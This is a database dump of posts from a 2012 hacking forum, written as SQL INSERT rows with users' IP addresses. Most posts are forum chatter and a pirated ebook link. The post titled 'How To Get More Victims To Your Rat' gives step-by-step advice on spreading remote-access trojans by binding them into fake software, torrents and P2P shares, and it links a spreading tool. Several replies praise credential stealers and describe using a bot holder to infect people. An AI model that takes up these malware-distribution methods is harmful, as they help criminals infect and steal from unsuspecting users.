Encrypt Your Entire Windows Operating System. \r\nHack 23: Set Up 2-Step Verification for Your Google Account. \r\nHack 24: Design Your Own Planner. \r\nHack 25: Make Your To-Do List Doable. \r\nHack 26: Set Up a Morning Dash. \r\nHack 27: Map Your Time. \r\nHack 28: Quick-Log Your Workday. \r\nHack 29: Dash Through Tasks with a Timer. \r\nHack 30: Form New Habits with Jerry Seinfeld\'s Chain. \r\nHack 31: Control Your Workday. \r\nHack 32: Turn Tasks into Game Play. \r\nHack 33: Send Reminders to Your Future Self. \r\nHack 34: Take Great Notes. \r\nHack 35: Organize Your Life with Remember the Milk. \r\nHack 36: Organize Your Life in Text Files. \r\nHack 37: Set Up a Ubiquitous Note-Taking Inbox Across Devices. \r\nHack 38: Off-Load Your Online Reading to a Distraction-Free Environment. \r\nHack 39: Limit Visits to Time-Wasting Websites. \r\nHack 40: Permanently Block Time-Wasting Websites. \r\nHack 41: Reduce Email Interruptions. \r\nHack 42: Split Your Work Among Multiple Desktops. \r\nHack 43: Build a No-Fly Zone. \r\nHack 44: Set Up Communication Quiet Hours. \r\nHack 45: Clear Your Desktop. \r\nHack 46: Make Your House a Usable Home. \r\nHack 47: Sentence Stuff to Death Row. \r\nHack 48: Drown Out Distracting Sounds with Pink Noise. \r\nHack 49: Search the Web in Three Keystrokes. \r\nHack 50: Command Your Windows PC from the Keyboard. \r\nHack 51: Command Your Mac from the Keyboard. \r\nHack 52: Reduce Repetitive Typing with Texter for Windows. \r\nHack 53: Reduce Repetitive Typing with TextExpander for Mac. \r\nHack 54: Automatically Fill in Repetitive Web Forms. \r\nHack 55: Batch-Resize Photos. \r\nHack 56: Bypass Free Site Registration with BugMeNot. \r\nHack 57: Speed Up Web Pages on a Slow Internet Connection. \r\nHack 58: Securely Save Website Passwords. \r\nHack 59: Become a Scheduling Black Belt with Google Calendar. \r\nHack 60: Set Up an Automated, Bulletproof File Back Up Solution. \r\nHack 61: Automatically Back Up Your Files to an External Hard Drive (Mac). \r\nHack 62: Automatically Clean Up Your PC. \r\nHack 63: Automatically Clean Up Your Mac. \r\nHack 64: Automatically Reboot and Launch Applications. \r\nHack 65: Make Google Search Results Automatically Come to You. \r\nHack 66: Automatically Download Music, Movies, and More. \r\nHack 67: Access Your Most Important Files Anywhere with Dropbox. \r\nHack 68: Manage Your Documents in a Web-Based Office Suite. \r\nHack 69: Carry Your Life on a Flash Drive. \r\nHack 70: Create a Virtual Private Network (VPN) with Hamachi. \r\nHack 71: Run a Home Web Server. \r\nHack 72: Run Full-Fledged Webapps from Your Home Computer. \r\nHack 73: Build Your Personal Wikipedia. \r\nHack 74: Remotely Control Your Home Computer. \r\nHack 75: Give Your Home Computer a Web Address. \r\nHack 76: Optimize Your Laptop. \r\nHack 77: Speed Up Your Touchscreen Typing. \r\nHack 78: Break Down the Barrier Between Your Computer and Mobile Phone. \r\nHack 79: Remote Control Your Computer with Your Phone. \r\nHack 80: Automate Android Functions with Tasker. \r\nHack 81: Set Up One Phone Number to Rule Them All. \r\nHack 82: Augment Reality with Your Phone. \r\nHack 83: Remember Where You’ve Been Using Location Awareness. \r\nHack 84: Command Your Phone with Your Voice. \r\nHack 85: Use Your Camera Phone as a Scanner. \r\nHack 86: Make Your \"Dumbphone\" Smarter via Text Message. \r\nHack 87: Connect Your Computer to the Internet via Mobile Phone by \"Tethering\". \r\nHack 88: Develop Your (Digital) Photographic Memory. \r\nHack 89: Send and Receive Money on Your Mobile Phone with PayPal. \r\nHack 90: Google Like a Pro. \r\nHack 91: Subscribe to Websites with RSS. \r\nHack 92: Quickly Search Within Specific Websites from the Address Bar. \r\nHack 93: Extend Your Web Browser. \r\nHack 94: Supercharge Your Firefox Downloads with DownThemAll! \r\nHack 95: Get 10 Useful Bookmarklets. \r\nHack 96: Find Reusable Media Online. \r\nHack 97: Get Your Data on a Map. \r\nHack 98: Set Multiple Sites as Your Home Page. \r\nHack 99: Access Unavailable Websites via Google. \r\nHack 100: Have a Say in What Google Says About You. \r\nHack 101: Clear Your Web Browsing Tracks. \r\nHack 102: Rescue Your PC from Malware. \r\nHack 103: Protect Your PC from Malware. \r\nHack 104: Clean Up Your Startup. \r\nHack 105: Undo System Configuration Changes. \r\nHack 106: Truly Delete Data from Your Hard Drive. \r\nHack 107: Compare and Merge Files and Folders with WinMerge. \r\nHack 108: Firewall Your Windows PC. \r\nHack 109: Firewall Your Mac. \r\nHack 110: Speed Up Windows with a Thumb Drive. \r\nHack 111: Free Up Hard-Drive Space. \r\nHack 112: Resurrect Deleted Files. \r\nHack 113: Hot Image Your PC for Instant Restoration. \r\nHack 114: Hot Image Your Mac for Instant Restoration. \r\nHack 115: Recover Files from an Unbootable PC. \r\nHack 116: Share Windows Files. \r\nHack 117: Share Mac Files. \r\nHack 118: Keep Your Web Browser in Sync Across Computers. \r\nHack 119: Share a Single Printer Between Computers. \r\nHack 120: Optimize Your Dual Monitors. \r\nHack 121: Control Multiple Computers with a Single Keyboard and Mouse.\r\n\r\ndownload: http://adf.ly/382489/http://www.mediafire.com/?jrrmj6ri8aqg3n6\r\n\r\nOR\r\n\r\nmirror: http://adf.ly/382489/http://www.mediafire.com/?ws2nfcjjtcsec4y[/align]', '67.68.75.193', '1128549313', '1', '0', '203', '1348963614', '1', '1d6d7899051943c168d72015c4c0a393', '0', '1348963614'); INSERT INTO mybb_posts VALUES('2866', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1348963581', 'The more people, the more fun. The more people, the faster the contest will end.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c043d92b3e38b80feb318d5e6de843a6', '0', '0'); INSERT INTO mybb_posts VALUES('2867', '593', '0', '12', 'How To Get More Victims To Your Rat', '0', '203', 'NeonLights', '1348963872', '[align=center][img]http://4.bp.blogspot.com/-tx-aLhsJ2ho/T79U-Lsc60I/AAAAAAAAAPs/xnrS3FIQ5R4/s400/ztd8om.png[/img]\r\n\r\n\r\nMaybe you saw some people get hundreds of victims every day They rely on the penetration of random And all their victims from popular forums and torrent Today I will explain to you the ways in which they use .\r\n\r\n\r\n\r\nSources of the victims :\r\n\r\nTorrrent\r\nSocial networks & Forums\r\nSites publish the files like dvb-upload.com\r\nChat rooms\r\n\r\nHow to get victims :\r\n\r\nCreate a fake software Has become a widespread phenomenon in youtubeYou can experiment and you\'ll get thousands of victims But you first have to increase the number of Views I advise you to use vagex.com and Of course you you must to disable comment on your video\r\nTorrent the best source of victim you can easily create your account in thepiratebay.com and create a torent using Any program that supports torrent just choose a software and inject or bind this software with your clean server and do not forget to add trackers in your torrent\r\nThis video explain how to create a torrent :\r\n[video=youtube]http://www.youtube.com/watch?v=m1tgW_8t0MI&[/video]\r\n\r\nfrom the forums you can get a lot of victims Some times I put private software and remember Do not put a download link But (Pm Me :D for mediafire link) To target members :) So this method is not in all forums you can put the link in the warez site There is no need not explain :)\r\nSome professional hackers Use other ways They scan A large number of Random Ip To discover Exploit Will generally put a special topic in this type ...\r\n\r\nAnd finally offer you a program named Spread Robot With this program you can spread your server in (Shareaza - Areas - eMule )\r\n\r\nThe main interface of the program:\r\n\r\n[img]http://4.bp.blogspot.com/-B2as7_wk2kc/T79r_ka1_MI/AAAAAAAAAP4/JSTYtwJb9gA/s400/1.png[/img]\r\n\r\nClick Get Warez :\r\n[img]http://2.bp.blogspot.com/-JBCypwZHJUw/T79sN78V1RI/AAAAAAAAAQI/q0yVLeW6xWM/s400/2.png[/img]\r\n\r\n\r\nand choose the path of your server and Make Warez File :\r\n\r\nThen the software will create a file in which each of these programs and share the files in (Shareaza - Areas - eMule )\r\n\r\n[img]http://4.bp.blogspot.com/-RQVlHjK5Lb8/T79s4N86dFI/AAAAAAAAAQQ/HpE6kABDBQ0/s640/94994612.png[/img]\r\n\r\nAlways select Icon Setup or Install the Server and pumb the files Even up to 2mg using hex workshop\r\n\r\n\r\ndownload: http://adf.ly/382489/http://www.mediafire.com/?0qn1iiz9yx115w8[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '4ab69b586daccbe1a8f975b7a1359504', '0', '0'); INSERT INTO mybb_posts VALUES('2868', '594', '0', '64', 'Noobroom (Online Movie Streaming Site)', '0', '82', 'iTzIpod', '1348964266', 'There\'s this site that has been online for a while now. And this site allows you to instantly stream movies FREE. No Downloads. No Surveys. No Registrations. Just go on http://noobroom.com/ and then copy in the IP Address/URL Link which is http://37.128.191.200/\r\nAnd there you go! \r\nClick on the A-Z List and pick a movie. Then, sit back, relax, and watch!\r\n\r\nEnjoy!\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1af012b05d22f8711240d4050e182890', '0', '0'); INSERT INTO mybb_posts VALUES('2869', '595', '0', '65', 'What movie did you watch recently?', '0', '1', 't3h jok3r', '1348965064', 'I recently got done watching all Resident Evil movies.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'acf0e6c8808b3719617754f4c8df08e9', '0', '0'); INSERT INTO mybb_posts VALUES('2870', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1348965132', 'Transformers: Dark Of The Moon.\n\nWas alright. 5/5 I watched it today at 10 AM on Netflix.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d2eb16d2a10291d318129edfeb032aa', '0', '0'); INSERT INTO mybb_posts VALUES('2871', '596', '0', '3', '[Announcement]New forums added!', '0', '1', 't3h jok3r', '1348965311', 'I recently added the movies forum. Feel free to discuss your favorite movies there. I have also added a Movie RIPs section which will only be available to Elite.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b0ff3074a5489cb87d09a7589ea2b3b3', '0', '0'); INSERT INTO mybb_posts VALUES('2872', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '1', 't3h jok3r', '1348965388', 'We need 200 more posts to reach 3K posts. This is the 2,800th post.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a35886b8ab7457006ce551aeff7e6ba', '0', '0'); INSERT INTO mybb_posts VALUES('2873', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '203', 'NeonLights', '1348965709', 'Cool, i watched the nex expandables 2 this weekend :) was pretty chill', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e2289a7f6e54b31e054268a8e27d614b', '0', '0'); INSERT INTO mybb_posts VALUES('2874', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348966520', 'We can get that in a couple of days. Probably tomorrow, Monday, or Tuesday. Guaranteed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '153897d2641f1f78fdef3c7f0998eec5', '0', '0'); INSERT INTO mybb_posts VALUES('2875', '596', '2871', '3', 'RE: [Announcement]New forums added!', '0', '82', 'iTzIpod', '1348966560', 'Thanks for the update. Will hope it becomes active and boosts the forum\'s activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4df240ff79059aa0ba4b9c5e06cd7117', '0', '0'); INSERT INTO mybb_posts VALUES('2876', '539', '2783', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1348968456', '[quote=\'Timmy\' pid=\'2783\' dateline=\'1348891350\']\r\nWelcome to l33thacking and oh hell yeah my son got some pussy.\r\n[/quote]\r\n\r\nwhat do you mean by: my son got some pussy. ?\r\nand btw nice avatar :P', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '630b59136b8ba8efd70018cda7367df1', '0', '0'); INSERT INTO mybb_posts VALUES('2877', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '5', 'Timmy', '1348968770', 'I just watched wrong turn. Pretty cool movie.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4cb70ce8c8fa599382aef39317dd0352', '0', '0'); INSERT INTO mybb_posts VALUES('2878', '596', '2871', '3', 'RE: [Announcement]New forums added!', '0', '5', 'Timmy', '1348968812', 'NOw thats what im talking about. Thanks for the section', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7efab8a9646003137c453904b34d42d6', '0', '0'); INSERT INTO mybb_posts VALUES('2879', '539', '2876', '4', 'RE: YO WHAT UP!', '0', '5', 'Timmy', '1348968881', '[quote=\'NeonLights\' pid=\'2876\' dateline=\'1348968456\']\r\n[quote=\'Timmy\' pid=\'2783\' dateline=\'1348891350\']\r\nWelcome to l33thacking and oh hell yeah my son got some pussy.\r\n[/quote]\r\n\r\nwhat do you mean by: my son got some pussy. ?\r\nand btw nice avatar :P\r\n[/quote]\r\n\r\nThanks and you got a GF so you obviously gonna fuck her.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '822ec188d6c9a23dcabfc83d59510348', '0', '0'); INSERT INTO mybb_posts VALUES('2880', '539', '2879', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1348968957', '[quote=\'Timmy\' pid=\'2879\' dateline=\'1348968881\']\r\n[quote=\'NeonLights\' pid=\'2876\' dateline=\'1348968456\']\r\n[quote=\'Timmy\' pid=\'2783\' dateline=\'1348891350\']\r\nWelcome to l33thacking and oh hell yeah my son got some pussy.\r\n[/quote]\r\n\r\nwhat do you mean by: my son got some pussy. ?\r\nand btw nice avatar :P\r\n[/quote]\r\n\r\nThanks and you got a GF so you obviously gonna fuck her.\r\n[/quote]\r\n\r\nOOOOOO lol ok i see what u meen :P', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'da31159755ae0b223f822b1bcb6aff1b', '0', '0'); INSERT INTO mybb_posts VALUES('2881', '559', '2781', '3', 'RE: Upgrade Price Lowered', '0', '5', 'Timmy', '1348968969', 'Thats a good update and good luck with sales', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5235fd5e0a99040598b723909381f83', '0', '0'); INSERT INTO mybb_posts VALUES('2882', '518', '2874', '7', 'RE: 2,500 Total Forum Posts', '0', '5', 'Timmy', '1348969030', '[quote=\'iTzIpod\' pid=\'2874\' dateline=\'1348966520\']\r\nWe can get that in a couple of days. Probably tomorrow, Monday, or Tuesday. Guaranteed.\r\n[/quote]\r\n\r\nOh hell no, keep it clean bro. I will help too but lets make LH look more HQ instead of LQ spammed posts. Don\'t take me wrong.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'abda9f215ecca644660a90a713923a70', '0', '0'); INSERT INTO mybb_posts VALUES('2883', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '5', 'Timmy', '1348969114', 'Thanks for the download and instructions. I love stealers thanks a bunch.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '52b1fbbbae4f9dae5ea154358ca0d20e', '0', '0'); INSERT INTO mybb_posts VALUES('2884', '589', '2883', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1348969183', '[quote=\'Timmy\' pid=\'2883\' dateline=\'1348969114\']\r\nThanks for the download and instructions. I love stealers thanks a bunch.\r\n[/quote]\r\n\r\nGlad to hear :) ur welcome btw', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '191f33baf027f02298615726422359f1', '0', '0'); INSERT INTO mybb_posts VALUES('2885', '591', '2863', '21', 'RE: Amicitia Bot Holder', '0', '5', 'Timmy', '1348969214', 'What is this i still dont get it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7c1851c62944810e6d95bae41e5dd0c2', '0', '0'); INSERT INTO mybb_posts VALUES('2886', '597', '0', '3', '[Announcement]500 error solution', '0', '5', 'Timmy', '1348969292', 'I have noticed that I received 500 internal server error twice. Just to let everyone know that it\'s nothing to worry about just refresh the page and I sent jok3r a PM about it. Nothing serious about this error.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3cab02b2262b4bf0fa352c3c33794cf', '0', '0'); INSERT INTO mybb_posts VALUES('2887', '591', '2885', '21', 'RE: Amicitia Bot Holder', '0', '203', 'NeonLights', '1348969350', '[quote=\'Timmy\' pid=\'2885\' dateline=\'1348969214\']\r\nWhat is this i still dont get it.\r\n[/quote]\r\n\r\nits a type of botnet but in this case its used to keep ur bots in some sort of cage... example: when u put a dog in a cage he cant leave... this is what u use this for...\r\n\r\nu infect ppl using this, because its alot less detactable...\r\nand then u just send the bots to ur rat or botnet', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a5195a64de2d0f192134f399c68b5cee', '0', '0'); INSERT INTO mybb_posts VALUES('2888', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '5', 'Timmy', '1348969371', 'Spacefish, you do go inactive for a long time sometimes but whenever you create a thread its always HQ.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '481781663f74483069b22a293b318fe8', '0', '0'); INSERT INTO mybb_posts VALUES('2889', '591', '2863', '21', 'RE: Amicitia Bot Holder', '0', '5', 'Timmy', '1348969551', 'Oh shit, thats awesome i will check it out', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '74d98eb5cdc9b4af4529a1d9feacd1c8', '0', '0'); INSERT INTO mybb_posts VALUES('2890', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '5', 'Timmy', '1348969675', 'No problem. You did a great work on this thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '167a77b5164b3d41b0d73d391c7da535', '0', '0'); INSERT INTO mybb_posts VALUES('2891', '589', '2890', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1348969836', '[quote=\'Timmy\' pid=\'2890\' dateline=\'1348969675\']\r\nNo problem. You did a great work on this thread.\r\n[/quote]\r\n\r\nthx i spend a lot of time to make these threads for u guys :)', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'bcf749ec3804ab483913a273101dd909', '0', '0'); INSERT INTO mybb_posts VALUES('2892', '583', '2844', '17', 'RE: 500+ pictures of same girl E-Whore pack', '0', '5', 'Timmy', '1348969884', 'She\'s OD hot son, thanks for this and img tags aren\'t allowed here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ffb87f62425002b7c567de866a4209f1', '0', '0'); INSERT INTO mybb_posts VALUES('2893', '591', '2889', '21', 'RE: Amicitia Bot Holder', '0', '203', 'NeonLights', '1348969911', '[quote=\'Timmy\' pid=\'2889\' dateline=\'1348969551\']\r\nOh shit, thats awesome i will check it out\r\n[/quote]\r\n\r\nOMG, just tried using it and it doesn receive connections...\r\nil leave the download for a lil while to see if ppl have the same problem...\r\n\r\ni think its unstable now :(', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '33b4cb472937a29ad55cb89373288b59', '0', '0'); INSERT INTO mybb_posts VALUES('2894', '582', '2835', '15', 'RE: RobotStealer Free Stealer', '0', '5', 'Timmy', '1348969954', 'So what do we send to our victim?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c4493a8c371ea54b41a9c9923c1959df', '0', '0'); INSERT INTO mybb_posts VALUES('2895', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '5', 'Timmy', '1348970013', 'I watch prison break or play PS3.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '70b3519304b783e89591bf3b5304c5e7', '0', '0'); INSERT INTO mybb_posts VALUES('2896', '582', '2835', '15', 'RE: RobotStealer Free Stealer', '0', '203', 'NeonLights', '1348970063', 'good question... i havent personally used this program yet, but u should be able to figure it out :P\nlook for a tutorial somewhere ... but i think it works like a jdb and u jsut upload to a site idk tho', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a9fb7cebe0734f329802181ad48394b0', '0', '0'); INSERT INTO mybb_posts VALUES('2897', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '5', 'Timmy', '1348970122', 'I use AVG free edition because it\'s a famous antivirus.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9cebffe6545981c5766a576effdc1727', '0', '0'); INSERT INTO mybb_posts VALUES('2898', '562', '2791', '7', 'RE: World\'s Longest Email Address', '0', '5', 'Timmy', '1348970181', 'Lol nice site I will give it a try but does it really function has an email?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '06e56c8b8145ccacab5da79c5f9e73ba', '0', '0'); INSERT INTO mybb_posts VALUES('2899', '560', '2788', '24', 'RE: Windows 7 Official direct downloads', '0', '5', 'Timmy', '1348970224', 'Thanks a bunch, but text is all messed up on the page.', '72.231.24.165', '1223104677', '1', '0', '5', '1348970264', '1', '5d8b239a521d25d1b8d18343712916cc', '0', '1348970264'); INSERT INTO mybb_posts VALUES('2900', '597', '2886', '3', 'RE: [Announcement]500 error solution', '0', '82', 'iTzIpod', '1348970394', 'I already told t3h jok3r about this on Skype. Although I\'m pretty sure it\'s just the hosting.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e296f12f800b9ac13368b070f5ce7773', '0', '0'); INSERT INTO mybb_posts VALUES('2901', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348970436', 'I wasn\'t trying to say that we should all spam LQ posts... I was saying that we can achieve that in a couple days.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9f0d2ecea4fb2c5ac556b1ce02ba179', '0', '0'); INSERT INTO mybb_posts VALUES('2902', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '7', 'Romdu62', '1348970474', 'I watched Ted. Im not a kid its just that its a funny movie', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '64b08641c428a690c1039e80d097a4fa', '0', '0'); INSERT INTO mybb_posts VALUES('2903', '587', '2854', '65', 'RE: Who likes the Rocky Films?', '0', '7', 'Romdu62', '1348970512', 'Never heard of rocky films before.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8adf6fa4d5f6174d065a22119ec7a847', '0', '0'); INSERT INTO mybb_posts VALUES('2904', '583', '2844', '17', 'RE: 500+ pictures of same girl E-Whore pack', '0', '82', 'iTzIpod', '1348970550', 'You\'re right. Although I don\'t know why. Or is it just disabled in this section I\'m guessing.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14b1c900f1438ca92acaa82c19d8af92', '0', '0'); INSERT INTO mybb_posts VALUES('2905', '592', '2865', '11', 'RE: Lifehacker: The Guide to Working Smarter, Faster, and Better', '0', '7', 'Romdu62', '1348970566', 'I swear to god I\'m gonna read this and make sure I complete this ebook.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1b8378b4e24272b751f271f374bb6f67', '0', '0'); INSERT INTO mybb_posts VALUES('2906', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '82', 'iTzIpod', '1348970582', 'I love Prison Break. So does t3h jok3r :p Too bad the series ended :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1ef341bf9236efb41fa1766fd2fe6d03', '0', '0'); INSERT INTO mybb_posts VALUES('2907', '597', '2886', '3', 'RE: [Announcement]500 error solution', '0', '7', 'Romdu62', '1348970616', 'This comes through the hosting when it\'s receiving too much data or being overloaded.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fddd0605faeb7ee1e54af0ec698f8ba3', '0', '0'); INSERT INTO mybb_posts VALUES('2908', '598', '0', '42', 'Top 10 donors of 2012 US election', '0', '7', 'Romdu62', '1348970798', 'http://news.yahoo.com/photos/donors-list-slideshow/donors-list-photo-1348851129.html\r\n\r\nThe link above shows pictures of the top 10 donors of 2012 US president election. Speaking of elections, who are you voting for?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7738c79004dcf3c96ebbe868f8a96b06', '0', '0'); INSERT INTO mybb_posts VALUES('2909', '599', '0', '7', 'Someone refer the 200th Member', '0', '82', 'iTzIpod', '1348970816', 'L33tHacking currently has 199 Members. Whoever refers the 200th member, will receive a spot in Unique! (You can get kicked though if you are inactive, or leech, or post LQ, etc.)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f5383b6e8c0423fd0743e0754088e178', '0', '0'); INSERT INTO mybb_posts VALUES('2910', '558', '2769', '33', 'RE: Guess this font?', '0', '7', 'Romdu62', '1348970837', 'that\'s a good idea, asking dafont is the best thing to do.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '72aed2e6c937cff611f531273f624b30', '0', '0'); INSERT INTO mybb_posts VALUES('2911', '558', '2769', '33', 'RE: Guess this font?', '0', '82', 'iTzIpod', '1348971058', 'I sent them the font already. They are going to try to reply as soon as possible! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'deb3c62e968a1859ff665aa581ef2e45', '0', '0'); INSERT INTO mybb_posts VALUES('2912', '600', '0', '58', 'OMG HERE IT COMES!', '0', '1', 't3h jok3r', '1348971372', 'The long awaited usergroup finally gets added to the L33THacking community. Which group am I talking about?\n\n[spoiler]\n[font=Tahoma][color=#32CD32][b][align=center][size=xx-large][u]Gamers[/u][/size][/align][/b][/color][/font]\n\n[b]Userbar:[/b] [img]http://l33thacking.net/images/ub/gamer.png[/img]\n[b]Group Description:[/b] We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!\n[b]Forum Icon:[/b] [img]http://l33thacking.net/uploads/ficons/gamer.png[/img]\n\n[i][b]Group Leader:[/b][/i] [url=http://l33thacking.net/user-61.html]NXK[/url]\n\nNow the main question that many members have. [u]When will the gamers section be added?[/u] It will be up under a week or so. \n\nEnjoy!\n[/spoiler]', '72.231.24.165', '1223104677', '1', '0', '1', '1349038110', '1', '446720db02336ab2bddf2534ce8181ff', '0', '1349038110'); INSERT INTO mybb_posts VALUES('2913', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '1', 't3h jok3r', '1348972285', 'We already have 200+ members. Proof: http://l33thacking.net/user-207.html\n\nWe merged some users so we don\'t officially have 200.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a8283181d82697ddd7996ffc945eb1b', '0', '0'); INSERT INTO mybb_posts VALUES('2914', '601', '0', '3', 'Major Announcement by Jok3r!', '0', '1', 't3h jok3r', '1348972975', 'I\'m glad to announce that ?????? is coming back to L33THacking. For those who don\'t know who ?????? is, he was one of the first admins on LH. He left due to school and he got banned over a huge misunderstanding. \r\n\r\nHe will be a Staff member now. \r\n\r\nLink: http://l33thacking.net/user-3.html\r\n\r\nHe changed his username, he is now unknown has ??????????¢™', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c61623141c26839d910a92d8314c944b', '0', '0'); INSERT INTO mybb_posts VALUES('2915', '602', '0', '63', '[Request] Sig and Avatar', '0', '3', '??????????¢™', '1348973049', '[b]Hey guys I am back I was known as ?????? but now I am. If someone could make me a sig and avatar that says ??????????¢™ I would really appreciate. Doesnt matter about the colors I just want it to look nice.\r\nI have no money atm so I would appreciate it if you could do it for free, Thanks.[/b]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '20caca311a1e33ae84d85793be2e2e7a', '0', '0'); INSERT INTO mybb_posts VALUES('2916', '592', '2905', '11', 'RE: Lifehacker: The Guide to Working Smarter, Faster, and Better', '0', '203', 'NeonLights', '1348973167', '[quote=\'Romdu62\' pid=\'2905\' dateline=\'1348970566\']\r\nI swear to god I\'m gonna read this and make sure I complete this ebook.\r\n[/quote]\r\n\r\nLOL... id love to see you read the entire thing and actually complete it hahahha', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e865e817b055442e945b39d631470152', '0', '0'); INSERT INTO mybb_posts VALUES('2917', '600', '2912', '58', 'RE: OMG HERE IT COMES!', '0', '82', 'iTzIpod', '1348973515', 'Hey!! That\'s my ugly userbar! :D \n\nCongratulations NXK on owning your own usergroup!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c5f81c0e966ede89aa88e665c258ebda', '0', '0'); INSERT INTO mybb_posts VALUES('2918', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '82', 'iTzIpod', '1348973566', 'Welcome back Reborn. I don\'t know how to pronounce your new name so. I\'m sorry. I know you don\'t know me. But I\'m iTzIpod.\nYou can call me Jacob.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1ef2a728d1452a0309cc1a3656debcc1', '0', '0'); INSERT INTO mybb_posts VALUES('2919', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '82', 'iTzIpod', '1348973616', 'Welcome back.\n\nAlso, do you want it to be animated or just a regular signature (.png)\nJust saying your name only correct?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30b06f2069b98eaaaa90c0d74c428e2a', '0', '0'); INSERT INTO mybb_posts VALUES('2920', '331', '1545', '5', 'RE: New Rules and Instructions v.4', '0', '3', '??????????¢™', '1348973651', 'This is some great updates. I am glad to be back.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '26915643e9fcaebef9e380b7e704e0bd', '0', '0'); INSERT INTO mybb_posts VALUES('2921', '327', '1532', '5', 'RE: Staff Notice in threads', '0', '3', '??????????¢™', '1348973915', 'Sounds good, I will be the best staff member here AGAIN.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'e2cb29d762a8fcbcb75520154bb5d05b', '0', '0'); INSERT INTO mybb_posts VALUES('2922', '603', '0', '47', 'Custom Pastebin Source Code', '0', '3', '??????????¢™', '1348973990', '[b]Hello guys, I am giving away a pastebin like source code, There is a link of it below. Just post below and I will PM you the source.\n\nPreview Link: http://www.pastebintest.ulmb.com [/b]', '75.35.239.228', '1260646372', '1', '0', '3', '1348976137', '1', 'cad2e999ce29e62e7d029144e0be13a2', '0', '1348976137'); INSERT INTO mybb_posts VALUES('2923', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1348974082', 'I would love it to be animated and yes just my name. Thanks man, +rep for doing it IF you do it.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '7abf2953ace9015643f7142410c67db7', '0', '0'); INSERT INTO mybb_posts VALUES('2924', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1348974322', 'Thanks for the announcement. I am glad to be back and I will become one of the best staff members ever AGAIN.', 